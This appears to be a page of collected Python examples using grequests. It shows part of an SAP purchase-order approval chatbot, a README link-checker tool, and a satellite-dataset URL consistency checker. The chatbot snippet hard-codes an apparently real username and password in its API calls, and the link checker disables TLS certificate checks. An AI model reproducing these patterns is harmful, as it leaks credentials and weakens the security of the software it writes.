                    "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/Decision?sap-client=400&SAP__Origin='S4HMYINBOCLNT200'&InstanceID="
                    + "'" + present_task_instance_id + "'"
                    "&DecisionKey='0002'&Comments='test%20reject'"
                ]
                post_res = (grequests.post(u_post,
                                           auth=('pritamsa', 'rupu@0801'),
                                           headers=header_2,
                                           cookies=cookie)
                            for u_post in url_post)

                post_reque = grequests.map(post_res, size=1)
                response_array_post = []
                for response_post in post_reque:

                    if (response_post.status_code != 200):
                        print(
                            "hey problem in rejecting P.O. . Please try again later."
                        )
                        return rejection_failure_reply, bot_memo[
                            'index'], present_task_instance_id, bot_memo[
                                'created_by'], bot_memo['SupplierName'], bot_memo[
                                    'PurchaseOrderNetAmount'], rejection_failure_reply, '', '', bot_memo[
                                        'scrapped_po_no']

                    else:

                        return after_rejection_reply, bot_memo[
                            'index'], present_task_instance_id, bot_memo[
                                'created_by'], bot_memo['SupplierName'], bot_memo[
                                    'PurchaseOrderNetAmount'], after_rejection_reply, '', '', bot_memo[
                                        'scrapped_po_no']  #after this call the "next" task showing skill in bot

    # THIS LOGIC BELOW NEEDS TO BE RE_WRITTEN
    #************************************************************************************************************

    # elif((bot_nlp['ordinal'] and len(bot_nlp['ordinal']) <= bot_memo['no_of_line_items']) and present_skill == 'get_item_details'):
    elif (present_skill == 'get_item_details'):
        if (bot_nlp['ordinal']
                and len(bot_nlp['ordinal']) <= bot_memo['no_of_line_items']):
            # filter_item_ordinally = 'item : '+ (bot_nlp['ordinal'][bot_nlp['ordinal']['index']]['rank'])
            # print(filter_item_ordinally)
            print('///////////////////////////////////////////////////')
            nlp_ordinal_filter_index = bot_nlp['ordinal'][0][
                'index']  #this is the first element's index of nlp entity ordinal array
            individual_item_filter_string = 'item : ' + str(
                nlp_ordinal_filter_index + 1)
            item_level_reply_ordinally = bot_memo['all_item_details'][
                individual_item_filter_string]
            print(item_level_reply_ordinally)

            return str(item_level_reply_ordinally).strip(
                '{}'
            ), bot_memo['index'], bot_memo['instanceID'], bot_memo[
                'created_by'], bot_memo['SupplierName'], bot_memo[
                    'PurchaseOrderNetAmount'], bot_memo[
                        'after_approval_reply'], bot_memo[
                            'all_item_details'], bot_memo[
                                'no_of_line_items'], bot_memo['scrapped_po_no']

        elif (bot_nlp['ordinal'] == False and bot_nlp['number']
              and len(bot_nlp['number']) <= bot_memo['no_of_line_items']):
            # filter_item_ordinally = 'item : '+ (bot_nlp['ordinal'][bot_nlp['ordinal']['index']]['rank'])
            # print(filter_item_ordinally)
            print('///////////////////////////////////////////////////')
            nlp_number_filter_index = bot_nlp['number'][0][
                'scalar']  #this is the first element's index of nlp entity ordinal array
            individual_item_filter_string = 'item : ' + str(
                nlp_number_filter_index)
            item_level_reply_numerically = bot_memo['all_item_details'][
                individual_item_filter_string]
            print(item_level_reply_numerically)

            return str(
                item_level_reply_numerically
            ), bot_memo['index'], bot_memo['instanceID'], bot_memo[
                'created_by'], bot_memo['SupplierName'], bot_memo[
                    'PurchaseOrderNetAmount'], bot_memo[
                        'after_approval_reply'], bot_memo[
                            'all_item_details'], bot_memo[
                                'no_of_line_items'], bot_memo['scrapped_po_no']
Example #32
0
def main(doc, timeout, size, debug, allow_codes, whitelist):
    """
    Examples:
    simple call
    $ vl README.md

    Adding debug outputs

    $ vl README.md --debug

    Adding a custom timeout for each url. time on seconds.

    $ vl README.md -t 3

    Adding a custom size param, to add throttle n requests per time

    $ vl README -s 1000

    Skipping some error codes. This will allow 500 and 404 responses to
    be ignored

    $ vl README.md -a 500,404

    Adding Whitelists

    $ vl README.md -w server1.com,server2.com
    """
    t0 = time.time()
    links = [i[0] for i in LINK_RE.findall(doc.read())]
    request_urls = []
    counts = {}

    for link in links:
        # no static
        if is_static(link):
            STATICS.append(link)
            continue

        # no dupes
        if link in counts:
            counts[link] += 1
            continue
        else:
            counts[link] = 1

        parsed = urlparse(link)
        # fix no scheme links
        if not parsed.scheme:
            link = 'http://{0}'.format(link)

        # whitelisted
        if whitelist:
            exists = [i for i in whitelist if i in parsed.netloc]
            if exists:
                WHITELISTED.append(link)
                continue

        request_urls.append(link)

    # removing dupes
    counts_keys = counts.keys()
    DUPES.extend([(i, counts[i]) for i in counts_keys if counts[i] > 1])

    requests = (grequests.head(u, timeout=timeout, verify=False) for u in request_urls)
    responses = grequests.imap(requests, exception_handler=handle_exception,
                               size=size)

    for res in responses:
        color = 'green'
        if is_error_code(res.status_code):
            if res.status_code not in allow_codes:
                ERRORS.append((res.status_code, res.url))
                color = 'red'
            else:
                WHITELISTED.append(res.url)

        status = click.style(str(res.status_code), fg=color)
        click.echo('[{}] {}'.format(status, res.url))

    errors_len = len(ERRORS)
    exceptions_len = len(EXCEPTIONS)
    dupes_len = len(DUPES)
    white_len = len(WHITELISTED)

    if errors_len:
        click.echo()
        click.echo('Failed URLs:')
        for code, url in ERRORS:
            code = click.style(str(code), fg='red')
            click.echo('[{0}] {1}'.format(code, url))

    if exceptions_len and debug:
        import ssl
        click.echo('Exceptions raised:')
        click.echo('Note: OpenSSL Version = {0}'.format(ssl.OPENSSL_VERSION))
        click.secho('Check URLs for possible false positives', fg='yellow')
        for url, exception in EXCEPTIONS:
            click.echo('- {0}'.format(url))
            click.secho('{0}'.format(exception), fg='red', bold=True)

    if dupes_len and debug:  # pragma: nocover
        click.echo('Dupes:')
        for url, count in DUPES:
            click.secho('- {0} - {1} times'.format(url, count), fg='yellow',
                        bold=True)

    if white_len and debug:
        click.echo()
        click.echo('Whitelisted (allowed codes and whitelisted param)')
        for url in WHITELISTED:
            click.secho('- {0}'.format(url), fg='magenta')

    click.secho('Total Links Parsed {0}'.format(len(links)), fg='green')
    click.secho('Total Errors {0}'.format(errors_len), fg='red')
    click.secho('Total Exceptions {0}'.format(exceptions_len), fg='red')
    click.secho('Total Dupes {0}'.format(dupes_len), fg='yellow')
    click.secho('Total whitelisted {0}'.format(white_len), fg='yellow')
    click.secho('Total static {0}'.format(len(STATICS)), fg='yellow')

    if debug:
        click.echo('Execution time: {0:.2f} seconds'.format(time.time() - t0))

    if errors_len:
        sys.exit(1)
def main(sensor, start_date, days, api_endpoint):
    api = Api(api_endpoint)
    logger.info('Checking consistencty for %s between %s + %s' % (sensor, start_date, days))

    aoi_nw = (-180, 90)
    aoi_se = (180, -90)
    aoi_ne = (aoi_se[0], aoi_nw[1])
    aoi_sw = (aoi_nw[0], aoi_se[1])
    aoi = [aoi_nw, aoi_ne, aoi_se, aoi_sw, aoi_nw]
    wrong_urls = list()

    for delta_day in range(1, days):
        start_time = time.time()
        start_date_date = parse(start_date)+ datetime.timedelta(days=delta_day)
        end_date_date = start_date_date + datetime.timedelta(days=1)
        logger.info('Checking consistencty for %s between %s and %s' % (sensor, start_date_date.isoformat(), end_date_date.isoformat()))

        # Object representation
        results = api.search_dataset(aoi, 100, start_date_date, end_date_date, sensor, full_objects=False)

        url_resources = list()
        missing_urls = list()
        missing_types = list()

        for r in results:
            if r['resources']['s3public']['zip'] !=  None:
                url_resources.append(r['resources']['s3public']['zip'])
            else:
                missing_urls.append('%s:%s' % (r['tile_identifier'], r['entity_id']))
                missing_types.append('zip')
            if r['resources']['metadata']!=  None:
                url_resources.append(r['resources']['metadata'])
            else:
                missing_urls.append('%s:%s' % (r['tile_identifier'], r['entity_id']))
                missing_types.append('metadata')
            if r['resources']['quicklook'] != None:
                url_resources.append(r['resources']['quicklook'])
            else:
                missing_urls.append('%s:%s' % (r['tile_identifier'], r['entity_id']))
                missing_types.append('quicklook')


        logger.info('total scans: %d' %len(url_resources))
        logger.info('already missed resources: %d' %len(missing_urls))

        if False:
            for counter, res in enumerate(url_resources):
                req = requests.head(res)
                if req.status_code != requests.codes.ok:
                    print res, req.status_code
                    missing_urls.append(res)
                print res
                if (counter % 25) == 0:
                    print counter
        else:
            counter = 0
            for url_parts in chunks(url_resources, 500):
                counter+=1
                rs = (grequests.head(u) for u in url_parts)
                res = grequests.map(rs)
                for req in res:
                    if req is not None:
                        if req.status_code != requests.codes.ok:
                            wrong_urls.append(res)
                            missing_types.append('zip_registered')
                    else:
                        print req.url, req

        if len(wrong_urls) > 0:
            for item in wrong_urls:
                print item
                for req in item:
                    if req.status_code != requests.codes.ok:
                        append_data('/tmp/wrong_urls.txt', req.url)
        if len(missing_urls) > 0:
            append_data('/tmp/missing_urls.txt', missing_urls)

        if len(missing_types) > 0:
            for type in ['zip_registered', 'quicklook', 'metadata', 'zip']:
                logger.info('%d:%s' % (operator.countOf(missing_types, type), type))

        logger.info('wrong resources resources: %d' % len(wrong_urls))
        logger.info('Executed in %f secs.' % (time.time()-start_time))
    print 'Wrong URLs:', wrong_urls